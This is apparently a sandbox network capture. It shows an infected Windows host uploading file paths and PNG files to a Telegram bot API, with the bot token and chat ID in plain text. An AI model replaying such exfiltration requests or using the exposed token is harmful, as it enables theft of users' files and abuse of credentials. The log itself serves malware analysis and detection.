2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: 1f 3a 88 de fb 2d 85 4a e0 84 b0 f2 9a 5d db a4 7e cb db a8 11 27 a9 b4 49 4a 02 db 63 11 4b 6f 87 a5 05 36 49 67 7f a2 66 f8 b4 15 7a 4d 6c 06 46 70 d5 8c 6d 97 09 cb a3 5d 3a 68 c7 3e 63 a6 f7 5f ac fe ab 16 ee cf 15 be 03 67 6f 41 53 6a ed 91 1b b5 8c dc 65 1b c6 27 02 de a4 a8 79 4e b7 d3 f6 53 73 b0 0a 01 ef 3e 28 bc 13 e3 56 8e 85 29 30 f9 93 08 79 07 99 fb f3 ac 91 21 6f df fa c5 5c b7 14 cd d1 1e 81 ef c7 75 e5 e7 5d 6d d3 18 55 b2 b6 f6 a8 93 0f be 3b b7 51 c7 6b eb 1d 77 d5 22 6b cf f9 00 00 20 00 49 44 41 54 98 40 b2 3e c9 57 a3 b4 c9 dc 94 56 c0 3b b9 4d 8a d7 d7 4f ee 46 07 1f 29 b4 49 4a 02 6d b2 84 55 b7 81 d9 b8 fe 44 e1 90 45 aa dc b2 ac 89 ed ba bf bf 38 0f 63 da 65 e0 f2 68 97 11 02 db 6b f4 49 b9 7c d0 f2 a4 ca 64 38 23 5f 5f 0f 06 9e Data Ascii: :-J]~'IJcKo6IgfzMlFpm]:h>c_goASje'yNSs>(V)0y!o\u]mU;Qkw"k IDAT@>WV;MOF)IJmUDE8cehkI\|d8#__
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: 80 f6 e8 0a 3c 9e 54 8c 7a 50 f3 60 99 80 37 12 35 47 7d 8e 1a c1 5e 6b 9b c1 35 de 14 ae bb bc d7 da bb 95 75 59 fc 84 b0 f6 ba 5d db e4 a2 78 cd d3 c8 d7 25 d3 26 29 09 ec 9b a6 06 85 83 27 92 0c 89 fd 77 e5 66 68 3b 68 58 4d ea 31 23 e3 69 87 0e 43 db 65 ee f7 dd c7 7b a6 4a cd c9 71 5e b4 87 0b 73 0a ef d3 16 ad d7 ae 04 fa 73 f9 8b df 7b ef 4b 15 9e 18 8c 39 5c 00 24 41 11 b3 d2 39 1f 04 bc 40 42 02 07 36 53 03 5e 69 86 db 92 eb 6f 10 7b f9 a9 19 d0 1e d5 89 57 aa be 84 bb 95 e7 96 27 ed d1 6e fd 5b 5b 7b 84 14 6d 50 9f f9 7a 6c a0 78 52 6f af 9e e7 87 82 c4 c5 26 92 52 02 27 84 b5 d7 ed dc 26 13 de 33 a9 36 49 49 df 7e 6c e4 b2 4e 34 71 24 6f cc bf 29 47 63 da 41 e1 7e a5 34 6a 34 1d ed d0 2d e6 f7 63 97 f7 dd c7 7b a6 2c f0 99 9f 35 e4 95 df 97 d5 Data Ascii: <TzP`75G}^k5uY]x%&)'wfh;hXM1#iCe{Jq^ss{K9\$A9@B6S^io{W'n[[{mPzlxRo&R'&36II~lN4q$o)GcA~4j4-c{,5
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: 5e cd d6 a6 1e bb 79 28 b5 94 0c 0c 8c e4 db 99 19 55 e8 92 3b ad de 9b 36 5e 17 d7 39 37 35 b3 4b ad 06 14 8f c2 be d0 7f cf 69 93 46 ef 39 fd c0 14 6d b2 2e be f7 69 02 7d f3 92 42 e6 6e ed c1 dd e0 ca cc 1e 55 4f 5f b1 71 1f b5 bd 03 75 da 12 dc 8d 5d 99 59 99 d5 be 87 6a 91 f3 ef 7d 3d 8f 7c e9 8b 49 bc da ec d6 ef 31 bc e6 5c f5 64 3c a2 8a c8 8e 42 86 d7 7b f9 9b a5 0b d5 3b 95 a4 ce 6d 0d 49 9d c7 c4 73 66 e6 22 d0 ae a2 01 de b2 3e 94 5b da f0 5c de 3e 1c a2 7d 5f 5f 7b d1 e1 e8 9c e8 43 29 b7 a4 c7 52 c1 dd c8 a6 cb 89 7d 00 00 20 00 49 44 41 54 46 e1 9a 5e ee 58 f2 99 ee e9 60 ee 45 28 e1 80 92 cc ec cc cc de 9b d9 6b e8 e4 63 47 a1 34 c3 da e0 c7 3e ea e1 86 cf 48 07 0e af c2 3e 0d 57 94 dd 26 7b 49 28 18 67 b7 49 d8 a7 a1 6a ba bf 35 e4 ef b6 Data Ascii: ^y(U;6^975KiF9m.i}BnUO_qu]Yj}=\|I1\d<B{;mIsf">[\>}__{C)R} IDATF^X`E(kcG4>H>W&{I(gIj5
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: 52 89 86 78 34 68 21 69 14 a6 7a 5c 84 bf 27 6f 98 08 ee ee 5f 32 f8 2e 49 0f 66 b6 28 da 0e a1 b6 72 f2 26 36 ae dd 33 d4 51 d8 2a 92 17 d4 07 ad 8f c8 36 fd 3c 30 54 c9 0b 7a 99 0c af e4 f4 b9 27 b1 38 21 ba a1 68 80 77 26 7f ef 95 0c 36 cd b5 5e 6b 2f eb 6f 79 db 1e 46 80 77 ff 8a d6 49 46 d2 d8 4d 15 d9 93 56 a7 3d 4f 14 d9 69 c1 e9 c6 e9 7b e0 79 a9 7a 96 7e 10 30 19 50 f6 65 1e 50 9e 0f 30 1d b7 bd 1b 07 e6 56 d2 4b e2 ff 5f 98 d9 c5 b6 a0 53 28 d7 70 af 30 13 b1 ea 87 87 64 93 74 c2 c9 d0 83 f7 6b 6d a2 c8 2e 34 de 12 08 f4 e5 1a ee e5 4b 8e 55 bf 56 44 b4 49 86 73 f9 01 dd ba 12 d7 e6 1a 62 19 92 9a 84 f3 cf a3 ea 1b 64 5f 48 9a f5 29 b8 2b 75 2b c0 1b 37 c4 48 d2 b3 d6 57 7b 9c ca 47 cf 09 ee ee 5f fa 47 3d 92 34 31 b3 f3 6d 3f f8 90 a9 1b b7 e7 Data Ascii: Rx4h!iz\'o_2.If(r&63Q*6<0Tz'8!hw&6^k/oyFwIFMV=Oi{yz~0PeP0VK_S(p0dtkm.4KUVDIsbd_H)+u+7HW{G_G=41m?
2024-05-23 13:36:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:25 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:24 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
247	192.168.2.5	61303	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:25 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:36:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:25 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 32 35 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+256.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:36:25 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:25 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
248	192.168.2.5	61305	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:25 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 204 Expect: 100-continue
2024-05-23 13:36:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:26 UTC	204	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 41 64 64 72 65 73 73 42 6f 6f 6b 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 74 68 65 6d 65 73 25 35 43 64 61 72 6b 25 35 43 41 64 64 72 65 73 73 42 6f 6f 6b 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 33 33 38 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+AddressBook.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cthemes%5Cdark%5CAddressBook.png%0ASize%3A+338+B
2024-05-23 13:36:26 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:26 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
249	192.168.2.5	61304	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:25 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 258 Expect: 100-continue
2024-05-23 13:36:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:26 UTC	258	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 31 32 34 65 66 61 39 39 31 37 36 65 35 33 38 32 35 32 61 32 61 65 33 63 65 66 32 31 33 37 65 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 63 31 32 34 65 66 61 39 39 31 37 36 65 35 33 38 32 35 32 61 32 61 65 33 63 65 66 32 31 33 37 65 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 33 31 32 Data Ascii: chat_id=1655240967&text=File%3A+c124efa99176e538252a2ae3cef2137e.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5Cc124efa99176e538252a2ae3cef2137e.png%0ASize%3A+312
2024-05-23 13:36:26 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:26 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
250	192.168.2.5	61306	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:26 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="9fdd44d1-095a-4d58-b4c3-0c52decf4d65" Host: api.telegram.org Content-Length: 4887 Expect: 100-continue
2024-05-23 13:36:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:26 UTC	40	OUT	Data Raw: 2d 2d 39 66 64 64 34 34 64 31 2d 30 39 35 61 2d 34 64 35 38 2d 62 34 63 33 2d 30 63 35 32 64 65 63 66 34 64 36 35 0d 0a Data Ascii: --9fdd44d1-095a-4d58-b4c3-0c52decf4d65
2024-05-23 13:36:26 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 32 35 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 32 35 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=256.png; filename*=utf-8''256.png
2024-05-23 13:36:26 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 11 a0 49 44 41 54 78 9c ed dd 6d ac 65 d5 59 07 f0 ff b3 d6 de e7 e5 de 3b dc 61 4a 67 10 24 a5 a1 60 14 63 d0 9b 34 29 b6 74 ac 9a a0 26 c4 2f 97 0f 62 a3 b4 82 62 62 94 7e 51 92 36 1e 6d 89 34 31 7e 31 b6 09 62 3a 86 f6 83 5c 8d 05 a3 c6 a4 49 af 96 16 d0 de d0 2a 58 85 a2 c2 58 64 66 98 97 fb 36 e7 6d ef e7 f1 c3 3e fb de 33 bc cd cc be f7 9c bd f7 59 ff 1f 39 e1 32 5c c8 da eb ec f5 5f 7b 3f fb 65 01 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 34 2b a4 ec 06 4c 86 09 3a 10 3c 0f 39 7a f3 aa 00 47 01 00 9b af 42 80 b5 92 db 16 a2 25 ac 5d 03 43 07 29 20 56 76 6b 68 26 99 1c ed 58 b4 74 af c5 65 b7 84 de c1 f2 63 be ec 26 d0 ae d9 38 02 e8 98 43 47 Data Ascii: PNGIHDR\rfIDATxmeY;aJg$`c4)t&/bbb~Q6m41~1b:\I*XXdf6m>3Y92\_{?eDDDDDDDDDDDDDDD4+L:<9zGB%]C) Vvkh&Xtec&8CG
2024-05-23 13:36:26 UTC	473	OUT	Data Raw: fe b6 0e f1 bb 66 c9 e7 4d d3 7e e3 c0 7c cb 60 62 40 df cc 06 02 28 00 1d 3f 25 e0 e9 01 bd 93 b7 d9 57 54 00 cd f6 29 19 00 e2 9a 07 16 da a6 e9 29 4d f5 33 dd e1 f6 1f 3d d9 39 f8 5f 75 bd 18 55 bf 16 03 c0 b2 79 ac 48 0a 00 1f f9 f4 b9 1b 54 dd 3d be bd f0 d3 3a 38 7f 73 d4 9e 6f 42 01 4d fa 30 4d 01 58 16 04 96 9d 1b 00 c8 9f 28 26 ba c0 ee fe 61 10 71 30 98 17 88 88 8b e0 e2 06 c4 01 c3 ee d6 ba 8b da cf a7 fd ad bf e9 eb e2 c3 4f 75 e4 0c 00 a0 63 0e 1d a9 fc 8d 3f 6f 54 cf 00 c8 ed 74 7a c7 dd da f9 8d 9f 6a f8 d6 3d ce d9 87 20 d1 bc 69 12 89 48 4b 9c 03 c4 23 db d4 7c e4 d7 7b b3 69 52 c6 f7 0f cb 26 90 ec d6 f3 ae f3 8d a1 a6 bd 2d 98 fd ad 41 1f 5e fd e4 c1 6f 02 a8 ed c0 cf cd ce 48 58 7e cc 7f f0 c7 96 af b0 e1 e6 0f c7 3e 7a bf 68 7a 9b 38 Data Ascii: fM~\|`b@(?%WT))M3=9_uUyHT=:8soBM0MX(&aq0Ouc?oTtzj= iHK#\|{iR&-A^oHX~>zhz8
2024-05-23 13:36:26 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 39 66 64 64 34 34 64 31 2d 30 39 35 61 2d 34 64 35 38 2d 62 34 63 33 2d 30 63 35 32 64 65 63 66 34 64 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --9fdd44d1-095a-4d58-b4c3-0c52decf4d65Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:36:26 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:36:26 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 39 66 64 64 34 34 64 31 2d 30 39 35 61 2d 34 64 35 38 2d 62 34 63 33 2d 30 63 35 32 64 65 63 66 34 64 36 35 2d 2d 0d 0a Data Ascii: --9fdd44d1-095a-4d58-b4c3-0c52decf4d65--
2024-05-23 13:36:27 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:26 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
251	192.168.2.5	61307	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:27 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="9efd76a0-7ba4-4af0-a6aa-28899ddd0f85" Host: api.telegram.org Content-Length: 672 Expect: 100-continue
2024-05-23 13:36:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:27 UTC	40	OUT	Data Raw: 2d 2d 39 65 66 64 37 36 61 30 2d 37 62 61 34 2d 34 61 66 30 2d 61 36 61 61 2d 32 38 38 39 39 64 64 64 30 66 38 35 0d 0a Data Ascii: --9efd76a0-7ba4-4af0-a6aa-28899ddd0f85
2024-05-23 13:36:27 UTC	109	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 41 64 64 72 65 73 73 42 6f 6f 6b 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 41 64 64 72 65 73 73 42 6f 6f 6b 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=AddressBook.png; filename*=utf-8''AddressBook.png
2024-05-23 13:36:27 UTC	338	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 12 00 00 00 12 08 06 00 00 00 56 ce 8e 57 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 0c 49 44 41 54 38 11 63 60 a0 12 60 84 99 73 ee dc b9 1f ff ff ff 67 37 36 36 66 3c 7b f6 ec 7f 98 38 3e 9a 91 91 f1 09 50 3e cd c8 c8 68 3b 13 4c 21 c8 10 18 9b 58 1a a8 47 06 a8 76 16 48 3d dc 20 62 35 a3 ab 83 1a 46 92 41 bf 81 86 80 30 56 40 ac 8b 1e b3 b2 b2 8a 0b 08 08 88 02 c3 e5 36 36 93 88 32 08 a8 79 ab 9e 9e de 7b 65 65 e5 8f 40 af 6c 20 db 20 a0 66 0e 98 66 a0 a1 3c 30 36 32 cd 82 cc c1 c3 0e be 7c f9 72 c5 ef df bf 99 81 86 46 63 53 47 d0 6b 40 17 fc 03 e2 03 ff fe fd 63 05 d2 6c 40 7c 14 88 31 d2 19 21 17 fd 00 da ee 0e 4c 70 87 90 5c e1 75 fe fc 79 2f 20 7f 33 d0 75 70 87 c0 19 48 0a 91 99 3b d0 Data Ascii: PNGIHDRVWsRGBIDAT8c``sg766f<{8>P>h;L!XGvH= b5FA0V@662y{ee@l ff<062\|rFcSGk@cl@\|1!Lp\uy/ 3upH;
2024-05-23 13:36:27 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 39 65 66 64 37 36 61 30 2d 37 62 61 34 2d 34 61 66 30 2d 61 36 61 61 2d 32 38 38 39 39 64 64 64 30 66 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --9efd76a0-7ba4-4af0-a6aa-28899ddd0f85Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:36:27 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:36:27 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 39 65 66 64 37 36 61 30 2d 37 62 61 34 2d 34 61 66 30 2d 61 36 61 61 2d 32 38 38 39 39 64 64 64 30 66 38 35 2d 2d 0d 0a Data Ascii: --9efd76a0-7ba4-4af0-a6aa-28899ddd0f85--
2024-05-23 13:36:27 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:27 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
252	192.168.2.5	61308	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:27 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="004aaa9b-31de-413b-be07-2538580bcce4" Host: api.telegram.org Content-Length: 319894 Expect: 100-continue
2024-05-23 13:36:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:27 UTC	40	OUT	Data Raw: 2d 2d 30 30 34 61 61 61 39 62 2d 33 31 64 65 2d 34 31 33 62 2d 62 65 30 37 2d 32 35 33 38 35 38 30 62 63 63 65 34 0d 0a Data Ascii: --004aaa9b-31de-413b-be07-2538580bcce4
2024-05-23 13:36:27 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 31 32 34 65 66 61 39 39 31 37 36 65 35 33 38 32 35 32 61 32 61 65 33 63 65 66 32 31 33 37 65 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 31 32 34 65 66 61 39 39 31 37 36 65 35 33 38 32 35 32 61 32 61 65 33 63 65 66 32 31 33 37 65 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=c124efa99176e538252a2ae3cef2137e.png; filename*=utf-8''c124efa99176e538252a2ae3cef2137e.png
2024-05-23 13:36:27 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 0d 00 00 04 81 08 06 00 00 00 c6 ed 01 4f 00 00 80 00 49 44 41 54 78 da ec bd 07 74 15 57 9a ae cd fd ef ff cf dc 99 b9 ab a7 a7 c3 dc db 61 3a d9 6e bb ed ee b1 dd 6e 27 c0 98 1c 45 46 e4 28 24 81 c8 19 84 c8 22 4a 04 93 73 12 39 9a 6c 72 ce 41 08 25 82 72 3c 3a 39 29 a7 f7 af af 0e 25 0e 42 60 82 04 92 78 df b5 9e 25 38 a7 aa ce ae 5d 55 bb 6a ef b7 be 6f d7 30 18 0c 20 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 bc bd d4 88 8a 8a 02 21 84 90 37 43 64 64 24 21 a4 1a c2 f6 8d 10 42 08 21 84 10 42 08 21 84 54 25 1e 3c 78 80 1a 67 cf 9e 05 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 e4 ed e4 c6 8d 1b 2e d3 50 dc 43 86 5d 12 42 c8 eb 41 af d7 c3 62 b1 20 3f 3f 1f 14 45 55 4f e5 e5 e5 c1 6c 36 Data Ascii: PNGIHDROIDATxtWa:nn'EF($"Js9lrA%r<:9)%B`x%8]Ujo0 B!B!B!!7Cdd$!B!B!T%<xg!B!B!B!.PC]BAb ??EUOl6
2024-05-23 13:36:27 UTC	4096	OUT	Data Raw: 9b b5 c2 9c 63 ae 1a 2e 0c 5f 8b 7a b5 1b 62 d2 81 8c 6a 55 83 72 2d ba 9b 82 72 7d 48 db ac 5d 43 f2 9d 74 e0 b4 ef e4 1a 7e 13 a6 a1 ac a3 3d 2f 69 1d 2f 49 4d 2a 9d c8 c3 87 0f ab 0f d0 2f ff 4c 65 84 55 b9 87 24 5c dc 8c 81 fd 7b 63 ea b2 63 48 48 cb 44 4e 76 ae b2 5d bb 9a 05 40 a7 53 9e 13 94 df b5 6a 58 cc 25 e9 ad b5 fb b8 eb 7e 64 2e 31 fc e4 1e 29 9f 97 dc 2b 1f de 27 2d 76 07 6e ef 98 89 3e 3e 33 71 21 c3 04 9b d9 58 32 af ae 7a 0f 7b 78 8f fc b1 b4 e4 34 0d 09 21 84 10 42 08 21 55 11 e9 b3 49 1f 51 5e fa 16 33 4e c6 4f b4 71 65 e9 d7 24 26 26 aa fd 3c 31 4d 76 ed da a5 66 c2 93 14 8d 62 26 4a bf 49 96 93 31 6b 79 a9 55 22 00 67 cc 98 a1 8e 27 97 b7 41 22 7d 3f 89 18 94 fe b0 8c 81 4b 59 9e 16 e1 24 9f 4b 3a 45 31 6c ea d6 ad ab 8e 3f 69 fd b6 Data Ascii: c._zbjUr-r}H]Ct~=/i/IM*/LeU$\{ccHHDNv]@SjX%~d.1)+'-vn>>3q!X2z{x4!B!UIQ^3NOqe$&&<1Mvfb&JI1kyU"g'A"}?KY$K:E1l?i
2024-05-23 13:36:27 UTC	4096	OUT	Data Raw: 4b 3f b8 3c fa 69 36 a3 1e f1 19 46 7c 1a 91 ff a4 69 18 ae 70 32 a3 c4 08 7c 11 d3 f0 7f 28 7f 83 6e c6 54 09 d3 50 1b 1f 90 fa 2f 6b 6e bf e7 41 d6 ad 2a 26 da cb 98 86 72 3d 89 b7 22 01 12 55 d1 34 d4 0c 43 31 3d e5 1a d2 ae 7b f9 5c 8c 43 19 13 12 33 51 c6 41 9e f7 25 f1 37 6a 1a 6a 83 36 62 b8 49 94 9e 0c 68 bf 08 b2 8e ac 2b 95 f2 ba 07 7c b4 06 56 4e 24 09 f3 96 01 78 19 68 d3 26 95 3d 75 ea 14 7a f7 ee ad 9e a0 1a 13 27 4e c4 fd fb f7 d5 75 a5 01 97 65 be fb ee 3b f5 6d ff 37 61 1a 1a f4 4a c3 6c b7 22 23 e6 36 0e ae 5a 82 d1 5d 3c d0 ac ad 27 86 07 af c1 e5 c4 14 58 24 e2 4c 97 8a 34 7d 1a 9c 39 b9 28 2c 28 80 e3 de 49 cc f4 69 89 fe f3 0e 23 d5 56 08 4b 94 98 86 ed 30 70 c1 5e c4 9b 65 80 af 10 e9 37 b6 63 48 a7 96 f0 09 dc 89 07 46 27 8a 8b 8a Data Ascii: 